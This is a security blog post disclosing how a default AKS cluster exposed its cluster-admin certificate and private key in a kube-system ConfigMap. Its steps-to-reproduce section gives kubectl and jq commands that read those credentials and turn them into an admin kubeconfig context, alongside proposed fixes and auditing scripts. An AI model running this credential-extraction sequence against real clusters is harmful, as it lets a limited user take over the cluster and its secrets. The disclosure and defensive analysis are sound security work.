Privilege Escalation in AKS Clusters

![Photo: Wheaton_station_long_escalator_03 by Bohemian Baltimore, licensed under CC BY-SA 4.0](/images/blog/privilege-escalation-in-aks-clusters/o6hRN36hSbFL5cxvC3MxQQ.jpeg)

Photo: Wheaton_station_long_escalator_03 by Bohemian Baltimore, licensed under [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0)

Update: This has been fixed as of Wednesday 2020-09-18 and has been backported to previous releases as well. Thanks Jorge Palma!

Implementing fine-grained Kubernetes RBAC for your company is a challenging task, even more so when you are careful about secret management. It turns out AKS is not: in a default AKS (Azure Kubernetes Service) cluster, the cluster admin credentials are stored amongst configuration data, thus enabling users with read access to configuration data to become cluster admin. This is a textbook example of a privilege escalation attack.

Key Facts

- A vanilla AKS cluster stores the cluster admin private key in a Kubernetes ConfigMap instead of a Kubernetes Secret.

- This private key grants access to the cluster as cluster admin, covering all possible privileges.

- The ConfigMap mentioned above resides in the kube-system namespace, thus allowing privilege escalation from a namespace-scoped ConfigMap reader to cluster admin.

- This makes it impossible to grant cluster-wide ConfigMap read permissions to developers, and granting appropriate ConfigMap permissions instead can take significant effort.

- As one would expect secrets to be stored as Kubernetes Secrets, this is a dangerous pitfall when designing a reasonable Kubernetes RBAC setup in an AKS cluster.

Summary



Besides your own roles implemented for your Kubernetes RBAC, there are some built-in Roles or ClusterRoles such as the cluster-admin ClusterRole. Moreover, there are some built-in Subjects with these predefined roles assigned. Subjects can either be users, groups, or Service Accounts. Because Service Accounts use a different authentication mechanism, we focus on users and groups in this article. The following users and groups are provisioned by default in a freshly deployed AKS cluster:

When calling the Kubernetes API, before performing the requested action, the Kubernetes API server will check whether your privileges suffice. Among other mechanisms, authentication can be performed by presenting a certificate that proves your membership of a certain group. By default, there is a certificate and the corresponding private key proving the membership in the system:masters group which is, again by default, bound to the predefined cluster-admin ClusterRole (via the cluster-admin ClusterRoleBinding). The certificate and the corresponding private key are often referred to as the admin credentials since the cluster-admin ClusterRole grants full privileges to the whole cluster as the name suggests. Of course, you can issue other certificates proving membership of less powerful groups in case you choose certificates as the universal authentication mechanism. However, even if you opt for another authentication mechanism and don't provision custom certificates, the admin certificate built into AKS will remain valid. As these credentials allow full access to the cluster including all data volumes, dealing with these credentials must be done with the highest security requirements.

A pretty bad choice for storing this data is a Kubernetes ConfigMap, which, according to the official Kubernetes docs, is conceptually similar to Secrets, but provides a means of working with strings that don't contain sensitive information. ConfigMaps are intended to store configuration data rather than application or user data. As such, your developers will have a reasonable justification to demand read access to ConfigMaps, which puts any secrets stored in them at high risk. Nevertheless, a vanilla AKS cluster contains a ConfigMap revealing the admin certificate and its private key: the tunnelfront-kubecfg ConfigMap in the kube-system namespace. Its data section holds the key/value pairs client.pem, containing the admin certificate, and client.key, containing the corresponding private key.

Thus, having cluster-wide or kube-system-namespace-scoped read access to ConfigMaps provides access to the admin credentials. How do you use them? Just patch your $HOME/.kube/config accordingly, and you're ready to act with admin permissions (alternatively, use the appropriate kubectl config commands). All you need to do is create a new context for the cluster in question pointing to a user provided with the freshly obtained client credentials. A more detailed guide on how to proceed from here is provided further down.

As ConfigMaps offer such a convenient possibility to separate configuration data from application data, it is a shame not to be able to use this built-in distinction of data based on different security levels, in order to ensure a reasonable RBAC setup. Even worse: As ConfigMaps are intended to include non-sensitive data only, it is not far-fetched that there are Kubernetes clusters out there with ClusterRoles covering cluster-wide read access to ConfigMaps.
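Whether a given Role or ClusterRole in your own cluster falls into this category can be checked by looking at its rules. The following is a minimal Python sketch, not an official tool: it assumes the rules have already been fetched (for example the rules field of `kubectl get clusterrole <name> -o json`), the function names are hypothetical, and it ignores bindings, aggregated ClusterRoles and subresources. Note that list and watch also return full objects, data section included, so they expose the credentials just as get does.

```python
from typing import Dict, List

# Verbs that return the full ConfigMap object, including its data section.
READ_VERBS = ("get", "list", "watch")


def _matches(values: List[str], wanted: str) -> bool:
    """RBAC treats "*" as a wildcard in apiGroups, resources and verbs."""
    return "*" in values or wanted in values


def grants_configmap_read(rules: List[Dict], configmap: str = "tunnelfront-kubecfg") -> bool:
    """Return True if any PolicyRule lets its holder read the given ConfigMap."""
    for rule in rules:
        names = rule.get("resourceNames") or []
        if names and configmap not in names:
            continue  # rule is restricted to other, explicitly named ConfigMaps
        if (_matches(rule.get("apiGroups", []), "")  # "" is the core API group
                and _matches(rule.get("resources", []), "configmaps")
                and any(_matches(rule.get("verbs", []), v) for v in READ_VERBS)):
            return True
    return False


# A plain ConfigMap reader rule, a wildcard rule as in cluster-admin, and a Pod reader.
print(grants_configmap_read([{"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get", "list"]}]))  # True
print(grants_configmap_read([{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]))  # True
print(grants_configmap_read([{"apiGroups": [""], "resources": ["pods"], "verbs": ["get"]}]))  # False
```

Running this against every ClusterRole that is bound to human users gives a quick overview of who can read the admin credentials.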

The Microsoft Security Response Center states that granting cluster-wide (or kube-system-namespace-scoped) read access to ConfigMaps is a misconfiguration on the part of your Kubernetes cluster administrator. We strongly argue that the misconfiguration is on the part of AKS itself. What is missing is a way to give the people responsible for the health of the cluster access to configuration details. Currently, the only workaround we could think of is to create a namespace-scoped Role for every namespace except kube-system instead of simply creating one ClusterRole allowing read access to ConfigMaps. Besides producing a lot of unnecessary Role clutter, this approach has the disadvantage of not covering any namespace that is created later.
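The workaround can at least be scripted. This is a hedged sketch that generates one Role and one RoleBinding per namespace, skipping kube-system, wrapped in a single Kubernetes List object. The object name configmap-reader, the group placeholder and the namespace list are hypothetical; in practice the namespaces would come from `kubectl get namespaces`.

```python
import json
from typing import Dict, List

RBAC_API = "rbac.authorization.k8s.io"
EXCLUDED_NAMESPACES = {"kube-system"}


def configmap_reader_manifests(namespaces: List[str], group: str) -> Dict:
    """Return a v1 List with one Role and one RoleBinding per namespace,
    skipping kube-system, that grant `group` read access to ConfigMaps."""
    items: List[Dict] = []
    for ns in sorted(set(namespaces) - EXCLUDED_NAMESPACES):
        items.append({
            "apiVersion": f"{RBAC_API}/v1",
            "kind": "Role",
            "metadata": {"name": "configmap-reader", "namespace": ns},
            "rules": [{"apiGroups": [""], "resources": ["configmaps"],
                       "verbs": ["get", "list"]}],
        })
        items.append({
            "apiVersion": f"{RBAC_API}/v1",
            "kind": "RoleBinding",
            "metadata": {"name": "configmap-reader", "namespace": ns},
            "subjects": [{"kind": "Group", "name": group, "apiGroup": RBAC_API}],
            "roleRef": {"kind": "Role", "name": "configmap-reader", "apiGroup": RBAC_API},
        })
    return {"apiVersion": "v1", "kind": "List", "items": items}


if __name__ == "__main__":
    # Hypothetical namespaces and AAD group object ID.
    manifests = configmap_reader_manifests(["default", "kube-system", "team-a"],
                                           "<aad-group-object-id>")
    print(json.dumps(manifests, indent=2))
```

The printed JSON could be fed to `kubectl apply -f -`. The script has to be re-run for every new namespace, which is exactly the drawback described above.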

Unfortunately, this won't change in the near future as Microsoft regards this issue as a Won't fix.

Steps to Reproduce

In the following, replace everything in angle brackets with your custom values.

- Create a fresh AKS cluster with AAD integration:

az aks create --resource-group <resource-group-name> --name <cluster-name> --generate-ssh-keys --aad-server-app-id <aad-server-app-id> --aad-server-app-secret <aad-server-app-secret> --aad-client-app-id <aad-client-app-id> --aad-tenant-id <aad-tenant-id>

(Instructions on how to set up the server and client applications to integrate AAD into your AKS cluster can be found here: https://docs.microsoft.com/en-us/azure/aks/azure-ad-integration)

- Obtain the admin credentials, so that we can set up a restricted Role in the next step:

az aks get-credentials --resource-group <resource-group-name> --name <cluster-name> --admin

- Create a Role with the permission to read ConfigMaps in the kube-system namespace:

kubectl apply -f role_configmapreader.yml

with the file role_configmapreader.yml:

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: kube-system-configmap-reader
  namespace: kube-system
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "list"]

This is how one would typically assign roles to non-admin users of the cluster.

- Create a RoleBinding to bind some user to the restricted Role created above:

kubectl apply -f rolebinding_configmapreader.yml

with the file rolebinding_configmapreader.yml:

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: binding-to-kube-system-configmap-reader
  namespace: kube-system
subjects:
- kind: User
  name: <Azure Email Address (User Principal Name) or User Object ID>
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: kube-system-configmap-reader
  apiGroup: rbac.authorization.k8s.io

- Obtain and switch to the non-admin context for which you created the RoleBinding:

az aks get-credentials -n <cluster-name> -g <resource-group-name>

- Verify that you do not have permission to e.g. list the namespaces. If configured correctly, the following commands should fail:

kubectl get namespaces

kubectl get secrets -A

kubectl get secrets <some-secretname> -n <namespace-of-secret>

- Display the content of the ConfigMap tunnelfront-kubecfg by running the command below. You can see the admin credentials in the output as data.client.key and data.client.pem:

kubectl get configmap tunnelfront-kubecfg -n kube-system -o yaml

This is the actual vulnerability.

- Open the kube config file (usually in $HOME/.kube/) in your favorite editor. As you already have (read) access to the exact same cluster, you should see an entry for the cluster named <cluster-name> in the clusters section of your config file.

- Create a new entry in the users section with a new username as follows:

- name: <cluster-name>-tunnelfront
  user:
    client-certificate-data:
    client-key-data:

- Run the following command to extract and base64-encode the tunnelfront admin certificate, and copy the output from the console into the field client-certificate-data in the entry you created above (the users section in the config file):

kubectl get configmap tunnelfront-kubecfg -n kube-system -o json | jq -r '.data["client.pem"]' | base64 | tr -d '\n'

- Similarly, execute the following command and copy the output from the console into the field client-key-data in the entry you created in the users section of the config file:

kubectl get configmap tunnelfront-kubecfg -n kube-system -o json | jq -r '.data["client.key"]' | base64 | tr -d '\n'

- Add a new context with the username from the step above (in this example <cluster-name>-tunnelfront) and a new context name. You can do this either by creating a new entry in the contexts section of your config manually:

- context:
    cluster: <cluster-name>
    user: <cluster-name>-tunnelfront
  name: <cluster-name>-tunnelfront-context

... or by using kubectl to do the magic for us:

kubectl config set-context <cluster-name>-tunnelfront-context --cluster <cluster-name> --user <cluster-name>-tunnelfront

- Switch to the newly created context (in our case <cluster-name>-tunnelfront-context):

kubectl config use-context <cluster-name>-tunnelfront-context

Within the new context, you have full access to everything. You can now get the content of secrets and access running containers, disable any security controls in place (e.g. admission controllers), deploy new and terminate running containers and much more. Awesome!

- Verify that the authentication certificate you patched into the kube config does in fact grant cluster-admin privileges:

kubectl get configmap tunnelfront-kubecfg -n kube-system -o json | jq -r '.data["client.pem"]' | openssl x509 -noout -text

The output indicates that the certificate's Common Name is masterclient and that it belongs to the group system:masters.

- Obtain the list of ClusterRoleBindings:

kubectl get clusterrolebindings

You should be able to see the cluster-admin ClusterRoleBinding. You can now verify that the cluster-admin ClusterRoleBinding does indeed bind the cluster-admin ClusterRole to the group system:masters, and that the cluster-admin ClusterRole covers even the most privileged permissions:

kubectl get clusterrolebindings cluster-admin -o yaml

kubectl get clusterrole cluster-admin -o yaml
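The chain verified in the last steps (certificate group, ClusterRoleBinding, ClusterRole) can be modelled in a few lines. This is a deliberately simplified sketch, not the API server's actual authorizer: it only looks at ClusterRoleBindings and at User and Group subjects, the function name is hypothetical, and the binding data is a hand-written excerpt mirroring the default cluster-admin binding.

```python
from typing import Dict, List, Set


def effective_cluster_roles(user: str, groups: List[str],
                            bindings: List[Dict]) -> Set[str]:
    """Return the names of ClusterRoles bound to the user or to any of its groups."""
    roles: Set[str] = set()
    for binding in bindings:
        for subject in binding.get("subjects", []):
            kind, name = subject.get("kind"), subject.get("name")
            if (kind == "User" and name == user) or (kind == "Group" and name in groups):
                roles.add(binding["roleRef"]["name"])
    return roles


# Excerpt of the default binding: group system:masters -> ClusterRole cluster-admin.
default_bindings = [
    {
        "metadata": {"name": "cluster-admin"},
        "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
        "subjects": [{"kind": "Group", "name": "system:masters"}],
    }
]

print(effective_cluster_roles("masterclient", ["system:masters"], default_bindings))
# {'cluster-admin'}
```

The identity itself never appears in any binding: membership in system:masters, proven by the certificate, is all it takes.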

Exploit

Premise: Read access to the tunnelfront-kubecfg ConfigMap in the kube-system namespace.

Attack: Follow the Steps to Reproduce section above, starting with the actual vulnerability (step number 7, displaying the tunnelfront-kubecfg ConfigMap).

Detailed Background

Authentication

Kubernetes provides various authentication mechanisms to ensure that requests to the API server are legitimate. By default, authentication of AAD users as well as authentication of Service Accounts is done using Bearer Tokens including the username referenced in the (Cluster)RoleBindings. For your custom Kubernetes Subjects, however, there is the additional method of certificate authentication.

Keep in mind: Independent of your authentication choice, there will always be an admin certificate.

The admin certificate

root@tunnelfront-5f6ddfb44-hv9n2:/etc/kubernetes/kubeconfig# openssl x509 -in client.pem -inform pem -noout -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            04:c4:85:83:84:cf:5e:22:97:85:96:8b:b8:b3:0f:d9
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = ca
        Validity
            Not Before: Jan 2 13:42:49 2020 GMT
            Not After : Jan 1 13:52:49 2022 GMT
        Subject: O = system:masters, CN = masterclient
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (4096 bit)
                Modulus:
                    00:d7:21:48:b1:b1:46:20:67:1c:f5:ab:27:7a:55:

There is a ClusterRoleBinding which binds the preprovisioned cluster-admin ClusterRole to the system:masters group. This ClusterRoleBinding is deployed in your AKS cluster by default. Indeed, if someone accesses your AKS cluster from the admin context (which, given sufficient permissions on your AKS cluster resource, can be obtained by running az aks get-credentials -g <resource-group-name> -n <cluster-name> --admin), the username appearing in the API server logs will be masterclient. The masterclient username is taken from the Common Name of this very certificate.
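The mapping from certificate to identity can be illustrated with a small parser. Kubernetes' x509 client certificate authentication takes the username from the Common Name and the groups from the Organization fields; the sketch below applies that rule to the one-line subject format printed by openssl above. It is a naive, hypothetical helper (it does not handle escaped commas or multi-valued RDNs) meant only for illustration.

```python
from typing import List, Tuple


def identity_from_subject(subject: str) -> Tuple[str, List[str]]:
    """Map an openssl-style subject line to (username, groups):
    CN becomes the username, every O becomes a group."""
    user, groups = "", []
    for part in subject.split(","):
        key, _, value = part.partition("=")
        key, value = key.strip(), value.strip()
        if key == "CN":
            user = value
        elif key == "O":
            groups.append(value)
    return user, groups


print(identity_from_subject("O = system:masters, CN = masterclient"))
# ('masterclient', ['system:masters'])
```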

For some built-in AKS services, it is necessary to have the cluster-admin Role. One of the services in need of administrative privileges tunnels the traffic between the Kubernetes control plane and the minions: the tunnelfront Pod in the kube-system namespace. However, it should certainly not expose the cluster admin credentials in its corresponding tunnelfront-kubecfg ConfigMap ...

{
    "apiVersion": "v1",
    "data": {
        "client.key": "-----BEGIN RSA PRIVATE KEY----- ... -----END RSA PRIVATE KEY-----\n",
        "client.pem": "-----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----\n",
        "kubeconfig": "apiVersion: v1\nkind: Config\nclusters:\n- cluster:\n    certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt\n    server: https://vanilla-ak-vanilla-aks-reso-4ba0d1-c3295f00.hcp.westeurope.azmk8s.io:443\n  name: default\ncontexts:\n- context:\n    cluster: default\n    user: tunnelfront\n  name: default\ncurrent-context: default\npreferences: {}\nusers:\n- name: tunnelfront\n  user:\n    tokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token\n    client-certificate: /etc/kubernetes/kubeconfig/client.pem\n    client-key: /etc/kubernetes/kubeconfig/client.key\n"
    },
    "kind": "ConfigMap",
    "creationTimestamp": "2020-01-02T13:54:32Z",
    "metadata": {
        ...
    }
}

No workaround

The most unfortunate thing about this misconfiguration is that you cannot delete the credentials from the ConfigMap yourself. As soon as you edit or delete the ConfigMap in question, Kubernetes' addon-manager will detect that the ConfigMap was tampered with and reset it to its previous state. The actual fix, however, is pretty simple. Below, we take a look at the current implementation and at what should be changed.

Current implementation and potential fixes

Mounting ConfigMaps as Kubernetes Volumes in a Pod

Data stored in ConfigMaps can be made available to your Pods in various ways. Besides passing (particular) key/value pairs as environment variables to your container, Kubernetes offers the possibility of mounting the whole ConfigMap as a volume into the container. All you have to do is specify a mount path where the data from the ConfigMap will be provided later. What happens is that the values from all key/value pairs stored in the data section of your ConfigMap will be saved in files named like the corresponding keys in the specified mount path.

apiVersion: v1
kind: ConfigMap
metadata:
  name: test-config
  namespace: test
data:
  howDoIStoreSensitiveDataInKubernetes: "Kubernetes has implemented the concept of Secrets, where sensitive data should be stored. Storing sensitive data in ConfigMaps is generally a bad idea.\n"

apiVersion: v1
kind: Pod
metadata:
  name: test-pod
  namespace: test
spec:
  containers:
  - name: test-container
    image: docker.io/debian
    command: [ "/bin/sh", "-c", "sleep 30000" ]
    volumeMounts:
    - name: config-volume
      mountPath: /notSecretAtAll
  volumes:
  - name: config-volume
    configMap:
      name: test-config

Thus, applying these two files yields a container whose filesystem contains a file named /notSecretAtAll/howDoIStoreSensitiveDataInKubernetes, with the content Kubernetes has implemented the concept of Secrets, where sensitive data should be stored. Storing sensitive data in ConfigMaps is generally a bad idea.

root@test-pod :/# ls /notSecretAtAll/

howDoIStoreSensitiveDataInKubernetes

root@test-pod :/# cat notSecretAtAll/howDoIStoreSensitiveDataInKubernetes

Kubernetes has implemented the concept of Secrets, where sensitive data should be stored. Storing sensitive data in ConfigMaps is generally a bad idea.
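The projection can be modelled as follows. This is a simplified sketch that only reproduces the behavior described above: each key becomes a file whose content is the value. The real kubelet additionally writes the files through a hidden, symlinked directory to allow atomic updates, which the sketch leaves out; the function name is hypothetical, and the key names mirror the tunnelfront-kubecfg ConfigMap.

```python
import tempfile
from pathlib import Path
from typing import Dict, List


def project_configmap(data: Dict[str, str], mount_path: Path) -> List[str]:
    """Write every key/value pair of a ConfigMap's data section to a file
    named after the key, and return the resulting file names."""
    mount_path.mkdir(parents=True, exist_ok=True)
    for key, value in data.items():
        (mount_path / key).write_text(value)
    return sorted(p.name for p in mount_path.iterdir())


with tempfile.TemporaryDirectory() as tmp:
    # Placeholder values instead of real credentials.
    names = project_configmap(
        {"client.pem": "<certificate>", "client.key": "<private key>", "kubeconfig": "<kubeconfig>"},
        Path(tmp) / "kubeconfig",
    )
    print(names)  # ['client.key', 'client.pem', 'kubeconfig']
```

Anyone who can read the ConfigMap therefore sees exactly what the container sees in its files.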

The tunnelfront case

spec:
  ...
  containers:
  - env:
    - name: OVERRIDE_TUNNEL_SERVER_NAME
      value: vanilla-ak-vanilla-aks-reso-4ba0d1-c3295f00.hcp.westeurope.azmk8s.io
    - name: KUBE_CONFIG
      value: /etc/kubernetes/kubeconfig/kubeconfig
    image: mcr.microsoft.com/aks/hcp/hcp-tunnel-front:v1.9.2-v3.0.11
    ...
    volumeMounts:
    - mountPath: /etc/kubernetes/kubeconfig
      name: kubeconfig
      readOnly: true
    - mountPath: /etc/kubernetes/certs
      name: certificates
      readOnly: true
  volumes:
  - configMap:
      defaultMode: 420
      name: tunnelfront-kubecfg
      optional: true
    name: kubeconfig
  - hostPath:
      path: /etc/kubernetes/certs
      type: ""
    name: certificates

The tunnelfront Pod uses the mechanism described above to create a config file specifying its API authentication settings. Getting the YAML output of the tunnelfront deployment reveals the Pod spec shown above. The tunnelfront-kubecfg ConfigMap is mounted into the Pod, which provisions the client.key and client.pem files, containing the admin credentials, inside the container in the /etc/kubernetes/kubeconfig directory. The kubeconfig file in the same directory (/etc/kubernetes/kubeconfig/kubeconfig, referenced by the KUBE_CONFIG environment variable) points to these two files and is used for authenticating the tunnelfront Pod against the API server. So how could one achieve the same goal without having to expose sensitive data in ConfigMaps?

Clean solution

Service Accounts are the technical users of Kubernetes. Each time you deploy a new Service Account, Kubernetes deploys a corresponding token Secret with it, containing a bearer token for authentication as well as the cluster's CA certificate (ca.crt). If you specify a Service Account in a Pod spec, the Service Account's token is mounted into the Pod, where it can be found in the /var/run/secrets/kubernetes.io/serviceaccount directory inside the container. In the kube-system namespace, there already is a tunnelfront Service Account. As you can see in the kubeconfig of the tunnelfront Pod, tunnelfront actively uses the ca.crt key of the Secret to verify the API server's certificate and references the Service Account's token as an authentication credential in the user section. However, no permissions are bound to the tunnelfront Service Account (although there are a RoleBinding and a ClusterRoleBinding which bind non-existent Roles to the tunnelfront Service Account...). Thus, the token will never be used for authentication. (In case your kubeconfig specifies more than one authentication credential for a user, kubectl will try one after another until either none is left and the required permission was not covered by any of them, or until it finds valid credentials covering the requested permission.) So how can this Service Account solve our problem?

In fact, Service Accounts are technically Kubernetes Subjects to which you can bind ClusterRoles. Thus, one could deploy a ClusterRoleBinding that binds the tunnelfront Service Account in the kube-system namespace to the cluster-admin ClusterRole. Everything is already set up for a solution that does not resort to unconventionally patching together a config file inside the container. One would just need to deploy the ClusterRoleBinding and could thus get rid of the whole tunnelfront-kubecfg ConfigMap.
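For illustration, the proposed binding could look like the object built below. This is a sketch under the assumption that binding the existing tunnelfront Service Account is all that is needed; the binding name tunnelfront-cluster-admin and the helper function are hypothetical, not something AKS ships.

```python
import json
from typing import Dict


def service_account_binding(name: str, service_account: str, namespace: str,
                            cluster_role: str) -> Dict:
    """Build a ClusterRoleBinding granting `cluster_role` to a Service Account."""
    return {
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "kind": "ClusterRoleBinding",
        "metadata": {"name": name},
        "roleRef": {
            "apiGroup": "rbac.authorization.k8s.io",
            "kind": "ClusterRole",
            "name": cluster_role,
        },
        # ServiceAccount subjects belong to the core API group, so no apiGroup
        # is set; the namespace identifies which Service Account is meant.
        "subjects": [{"kind": "ServiceAccount", "name": service_account,
                      "namespace": namespace}],
    }


# The binding name is hypothetical; the other values are those discussed above.
print(json.dumps(service_account_binding("tunnelfront-cluster-admin", "tunnelfront",
                                         "kube-system", "cluster-admin"), indent=2))
```

The printed JSON could be piped into `kubectl apply -f -`; removing the tunnelfront-kubecfg ConfigMap afterwards, however, remains up to the AKS team.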

As seen above, Kubernetes has a built-in way of providing access to the API server. Thus, there should usually be no need to mount a self-patched config file into a container. But for the sake of argument, let's assume there is a reason that led the AKS team to decide against using Service Accounts. What then? Is there really no other way but storing the most powerful piece of data in a ConfigMap, instead of simply using a Secret?

A similarly ugly but secure solution

Kubernetes Secrets are basically the same as ConfigMaps except that the values in the data section are base64-encoded. Thus, the solution could be as easy as this: turn the tunnelfront-kubecfg into a Secret of type Opaque, with base64-encoded values in the data section, and mount the Secret into the container instead of the ConfigMap. This would be the simplest fix for the issue, a minimal change of only a few lines of code.
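The conversion itself is mechanical. A minimal sketch with hypothetical helper names and placeholder values instead of real key material: the Secret keeps the keys of the ConfigMap and base64-encodes each value, and the Pod's volume switches from a configMap source to a secret source with the same name.

```python
import base64
from typing import Dict


def configmap_to_secret(configmap: Dict) -> Dict:
    """Return an Opaque Secret carrying the same keys as `configmap`,
    with every value base64-encoded as the Secret's data field requires."""
    meta = configmap["metadata"]
    return {
        "apiVersion": "v1",
        "kind": "Secret",
        "type": "Opaque",
        "metadata": {"name": meta["name"], "namespace": meta["namespace"]},
        "data": {key: base64.b64encode(value.encode("utf-8")).decode("ascii")
                 for key, value in (configmap.get("data") or {}).items()},
    }


def secret_volume(volume_name: str, secret_name: str) -> Dict:
    """Pod volume that mounts the Secret where the ConfigMap used to be mounted."""
    return {"name": volume_name, "secret": {"secretName": secret_name, "defaultMode": 420}}


cm = {"metadata": {"name": "tunnelfront-kubecfg", "namespace": "kube-system"},
      "data": {"client.key": "<private key>", "client.pem": "<certificate>"}}
secret = configmap_to_secret(cm)
print(secret["data"]["client.key"])
print(secret_volume("kubeconfig", "tunnelfront-kubecfg"))
```

Inside the container nothing changes, because the kubelet writes the decoded values into the mounted files; /etc/kubernetes/kubeconfig would still contain client.key and client.pem in plain PEM form.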

However, implementing either solution is in the hands of Microsoft's AKS team; patching the cluster on your own won't work: if you tamper with the built-in AKS API resources, AKS tooling will kick in and reset all changes under its control.

What you “can” do

The only thing you can do yourself is to restrict access to this very ConfigMap. If you are afraid that the admin credentials of your production cluster have already been compromised, you can use one of the latest AKS features and rotate the cluster admin credentials. See https://docs.microsoft.com/en-us/azure/aks/certificate-rotation for more details.
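As a first step towards restricting access, it may help to know which ConfigMaps in your cluster hold private keys at all. A minimal sketch, assuming the input is the parsed JSON output of `kubectl get configmaps -A -o json`; the function name is hypothetical, and it only looks for PEM private key headers, so keys stored in other encodings will be missed.

```python
import re
from typing import Dict, List, Tuple

# Header of a PEM-encoded private key, e.g. "-----BEGIN RSA PRIVATE KEY-----"
# or "-----BEGIN PRIVATE KEY-----".
PRIVATE_KEY_PEM = re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----")


def find_private_keys(configmap_list: Dict) -> List[Tuple[str, str, str]]:
    """Return (namespace, name, key) for every ConfigMap value holding a PEM private key."""
    hits = []
    for item in configmap_list.get("items", []):
        meta = item.get("metadata", {})
        for key, value in (item.get("data") or {}).items():
            if PRIVATE_KEY_PEM.search(value):
                hits.append((meta.get("namespace", ""), meta.get("name", ""), key))
    return hits


# Shape of the tunnelfront-kubecfg ConfigMap, with the key material elided.
sample = {"items": [{
    "metadata": {"namespace": "kube-system", "name": "tunnelfront-kubecfg"},
    "data": {
        "client.key": "-----BEGIN RSA PRIVATE KEY----- ... -----END RSA PRIVATE KEY-----\n",
        "client.pem": "-----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----\n",
    },
}]}
print(find_private_keys(sample))
# [('kube-system', 'tunnelfront-kubecfg', 'client.key')]
```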

Response

Together with my colleagues Aymen Segni and Philipp Belitz, we found this misconfiguration and contacted the Microsoft Security Response Center (MSRC) on 22 November 2019. We received a pretty quick response, stating that Microsoft does not regard this issue as a misconfiguration by the AKS team. Instead, their stance is that granting read access to ConfigMaps in the kube-system namespace is a misconfiguration by your Kubernetes admin.

We know that creating visibility for an existing security issue is a fine line between raising awareness and handing an attack vector to potential attackers. In fact, we are quite certain that there are AKS clusters out there that are vulnerable to this type of attack. However, we don't think that the attack scales in a vastly dangerous manner, as the premise of having read access to the relevant ConfigMap must be met to begin with. We told the MSRC about our plans to publish this blog post in mid-December, which apparently did not change their mind. We still encourage the AKS team to fix their configuration!